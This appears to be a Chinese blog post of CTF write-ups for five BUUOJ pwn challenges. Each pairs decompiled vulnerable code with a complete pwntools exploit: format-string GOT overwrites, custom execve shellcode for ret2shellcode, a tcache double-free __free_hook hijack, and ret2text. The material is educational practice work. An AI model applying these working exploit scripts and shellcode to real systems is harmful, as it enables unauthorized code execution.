wdb_2018_2nd_easyfmt
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
char buf[100]; // [esp+8h] [ebp-70h] BYREF
unsigned int v4; // [esp+6Ch] [ebp-Ch]
v4 = __readgsdword(0x14u);
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
puts("Do you know repeater?");
while ( 1 )
{
read(0, buf, 0x64u);
printf(buf);
putchar(10);
}
}
fmt漏洞
泄露libc → 打got表
可以用fmtstr_payload打printf_got
from pwn import *
from LibcSearcher import *
url, port = "node4.buuoj.cn", 27466
filename = "./wdb_2018_2nd_easyfmt"
elf = ELF(filename)
libc = ELF("./libc_x86-2.23.so")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")
local = 0
if local:
context.log_level="debug"
io = process(filename)
# context.terminal = ['tmux', 'splitw', '-v']
# gdb.attach(io)
else:
io = remote(url, port)
def B():
gdb.attach(io)
pause()
def pwn():
printf_got = elf.got['printf']
payload = p32(printf_got) + b'%6$s'
io.sendlineafter("repeater?\n", payload)
io.recv(4)
printf_addr = u32(io.recv(4))
libc_base = printf_addr - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
log.info("system address: %#x" % system_addr)
payload = fmtstr_payload(6, {printf_got:system_addr})
io.sendline(payload)
io.sendline(b"/bin/sh\x00")
if __name__ == "__main__":
pwn()
io.interactive()
axb_2019_fmt64
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
char s[272]; // [rsp+10h] [rbp-250h] BYREF
char format[312]; // [rsp+120h] [rbp-140h] BYREF
unsigned __int64 v5; // [rsp+258h] [rbp-8h]
v5 = __readfsqword(0x28u);
setbuf(stdout, 0LL);
setbuf(stdin, 0LL);
setbuf(stderr, 0LL);
puts(
"Hello,I am a computer Repeater updated.\n"
"After a lot of machine learning,I know that the essence of man is a reread machine!");
puts("So I'll answer whatever you say!");
while ( 1 )
{
alarm(3u);
memset(s, 0, 0x101uLL);
memset(format, 0, 0x12CuLL);
printf("Please tell me:");
read(0, s, 0x100uLL);
sprintf(format, "Repeater:%s\n", s);
if ( (unsigned int)strlen(format) > 0x10E )
break;
printf(format);
}
printf("what you input is really long!");
exit(0);
}
fmt漏洞
第8个参数是zzzzzzzz
任意地址读写 → 泄露libc → 打got表
修改strlen到system
传入;/bin/sh\x00
from pwn import *
from LibcSearcher import *
url, port = "node4.buuoj.cn", 28169
filename = "./axb_2019_fmt64"
elf = ELF(filename)
libc = ELF("./libc_x64-2.23.so")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")
local = 0
if local:
context.log_level="debug"
io = process(filename)
# context.terminal = ['tmux', 'splitw', '-v']
# gdb.attach(io)
else:
io = remote(url, port)
def B():
gdb.attach(io)
pause()
def pwn():
puts_got = elf.got['puts']
strlen_got = elf.got['strlen']
payload = b"%9$sZZZZ" + p64(puts_got)
io.sendlineafter("Please tell me:", payload)
io.recvuntil("Repeater:")
puts_addr = u64(io.recvuntil(b"\x7f").ljust(8, b"\x00"))
log.info("puts address: %#x" % puts_addr)
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
log.info("system address: %#x" % system_addr)
log.info("binsh address: %#x" % binsh_addr)
# B()
high_system_addr = (system_addr >> 16) % 0x100
low_system_addr = system_addr % 0x10000
payload = b"%" + str(high_system_addr - 9).encode() + b"c%12$hhn"
payload += b"%" + str(low_system_addr - high_system_addr).encode() + b"c%13$hn"
payload = payload.ljust(32, b"Z") + p64(strlen_got + 2) + p64(strlen_got)
io.sendafter("Please tell me:", payload)
# B()
payload = b";/bin/sh"
io.sendafter("Please tell me:", payload)
if __name__ == "__main__":
pwn()
io.interactive()
x_ctf_b0verfl0w
int vul()
{
char s[32]; // [esp+18h] [ebp-20h] BYREF
puts("\n======================");
puts("\nWelcome to X-CTF 2016!");
puts("\n======================");
puts("What's your name?");
fflush(stdout);
fgets(s, 50, stdin);
printf("Hello %s.", s);
fflush(stdout);
return 1;
}
ret2shellcode, 但是需要一个小于32字节的shellcode, ret劫持到栈上的shellcode执行即可
构造栈结构如下
pwntools自带的shellcode是44字节太长了, 所以要自行编写shellcode, 基本功就不啰嗦了
xor eax, eax
xor edx, edx
xor ecx, ecx
push eax # push '\0'
push 0x68732f2f # push "//sh"
push 0x6e69622f # push “/bin”
mov ebx, esp # ebx <- "/bin//sh\x00"
mov al, 0x0b # execve() int 0x0b
int 0x80
exp
注意exp里的汇编不要带注释
from pwn import *
from LibcSearcher import *
url, port = "node4.buuoj.cn", 26702
filename = "./b0verfl0w"
elf = ELF(filename)
# libc = ELF("./")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")
local = 0
if local:
context.log_level = "debug"
io = process(filename)
# context.terminal = ['tmux', 'splitw', '-h']
# gdb.attach(io)
else:
io = remote(url, port)
def B():
gdb.attach(io)
pause()
def pwn():
shellcode = """
xor eax, eax
xor edx, edx
xor ecx, ecx
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
mov al, 0x0b
int 0x80
"""
shellcode = asm(shellcode)
shellcode = shellcode.ljust(0x20, b'\x00')
jmp_addr = 0x08048504
sub_jmp_asm = asm("sub esp, 0x28;jmp esp")
payload = shellcode + cyclic(4) + p32(jmp_addr) + sub_jmp_asm
io.sendline(payload)
if __name__ == "__main__":
pwn()
io.interactive()
ciscn_2019_es_1
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // [rsp+24h] [rbp-Ch] BYREF
unsigned __int64 v4; // [rsp+28h] [rbp-8h]
v4 = __readfsqword(0x28u);
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
puts("I hate 2.29 , can you understand me?");
puts("maybe you know the new libc");
while ( 1 )
{
while ( 1 )
{
menu();
__isoc99_scanf("%d", &v3);
getchar();
if ( v3 != 2 )
break;
show();
}
if ( v3 > 2 )
{
if ( v3 == 3 )
{
call();
}
else
{
if ( v3 == 4 )
{
puts("Jack Ma doesn't like you~");
exit(0);
}
LABEL_13:
puts("Wrong");
}
}
else
{
if ( v3 != 1 )
goto LABEL_13;
add();
}
}
}
unsigned __int64 add()
{
int v1; // [rsp+4h] [rbp-3Ch]
void **v2; // [rsp+8h] [rbp-38h]
size_t size[5]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 v4; // [rsp+38h] [rbp-8h]
v4 = __readfsqword(0x28u);
if ( heap_number > 12 )
{
puts("Enough!");
exit(0);
}
v1 = heap_number;
*((_QWORD *)&heap_addr + v1) = malloc(0x18uLL);
puts("Please input the size of compary's name");
__isoc99_scanf("%d", size);
*(_DWORD *)(*((_QWORD *)&heap_addr + heap_number) + 8LL) = size[0];
v2 = (void **)*((_QWORD *)&heap_addr + heap_number);
*v2 = malloc(LODWORD(size[0]));
puts("please input name:");
read(0, **((void ***)&heap_addr + heap_number), LODWORD(size[0]));
puts("please input compary call:");
read(0, (void *)(*((_QWORD *)&heap_addr + heap_number) + 12LL), 0xCuLL);
*(_BYTE *)(*((_QWORD *)&heap_addr + heap_number) + 23LL) = 0;
puts("Done!");
++heap_number;
return __readfsqword(0x28u) ^ v4;
}
unsigned __int64 call()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("Please input the index:");
__isoc99_scanf("%d", &v1);
if ( *((_QWORD *)&heap_addr + v1) )
free(**((void ***)&heap_addr + v1));
puts("You try it!");
puts("Done");
return __readfsqword(0x28u) ^ v2;
}
call()里有个double free
漏洞利用
(1) 开了Full RELRO, 只能打hook
(2) libc2.27存在tcache, 申请超过0x400的chunk绕过tcahe
(3) unsorted bin泄露main_arena + 0x60, 进而泄露libc
(4) double free 构造fake chunk到free hook, 劫持free hook
(5) free("/bin/sh\x00"), get shell
from pwn import *
from LibcSearcher import *
url, port = "node4.buuoj.cn", 25350
filename = "./ciscn_2019_es_1"
elf = ELF(filename)
libc = ELF("./libc64-2.27.so")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")
local = 0
if local:
context.log_level = "debug"
io = process(filename)
# context.terminal = ['tmux', 'splitw', '-h']
# gdb.attach(io)
else:
io = remote(url, port)
def B():
gdb.attach(io)
pause()
def add(size,name,compary):
io.sendlineafter('choice:','1')
io.sendlineafter("compary's name",str(int(size)))
io.sendafter('input name:',name)
io.sendafter('call:',compary)
def show(index):
io.sendlineafter('choice:','2')
io.sendlineafter('\n',str(index))
def call(index):
io.sendlineafter('choice','3')
io.sendlineafter('\n',str(index))
def pwn():
malloc_hook_libc = libc.sym['__malloc_hook']
free_hook_libc = libc.sym['__free_hook']
system_libc = libc.sym['system']
add(0x400 + 0x10, 'zzzz', 'ffff')
add(0x28, 'zzzz', 'ffff')
add(0x68, '/bin/sh\x00', 'ffff')
call(0) # free chunk0
show(0) # leak main_arena + 0x60
main_arena_0x60_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = main_arena_0x60_addr - 0x60 - 0x10 - malloc_hook_libc
free_hook_addr = libc_base + free_hook_libc
system_addr = libc_base + system_libc
call(1)
call(1) # double free
add(0x28, p64(free_hook_addr), 'ffff')
add(0x28, 'zzzz', 'ffff')
add(0x28, p64(system_addr), 'ffff') # change free_hook to system
call(2)
if __name__ == "__main__":
pwn()
io.interactive()
suctf_2018_basic pwn
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[268]; // [rsp+10h] [rbp-110h] BYREF
int v5; // [rsp+11Ch] [rbp-4h]
scanf("%s", s);
v5 = strlen(s);
printf("Hi %s\n", s);
return 0;
}
ret2text, 白给
from pwn import *
from LibcSearcher import *
url, port = "node4.buuoj.cn", 29969
filename = "./SUCTF_2018_basic_pwn"
elf = ELF(filename)
# libc = ELF("./")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")
local = 0
if local:
context.log_level = "debug"
io = process(filename)
# context.terminal = ['tmux', 'splitw', '-h']
# gdb.attach(io)
else:
io = remote(url, port)
def B():
gdb.attach(io)
pause()
def pwn():
back_door_addr = 0x0000000000401157
payload = cyclic(0x110 + 8) + p64(back_door_addr)
io.sendline(payload)
if __name__ == "__main__":
pwn()
io.interactive()
914
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
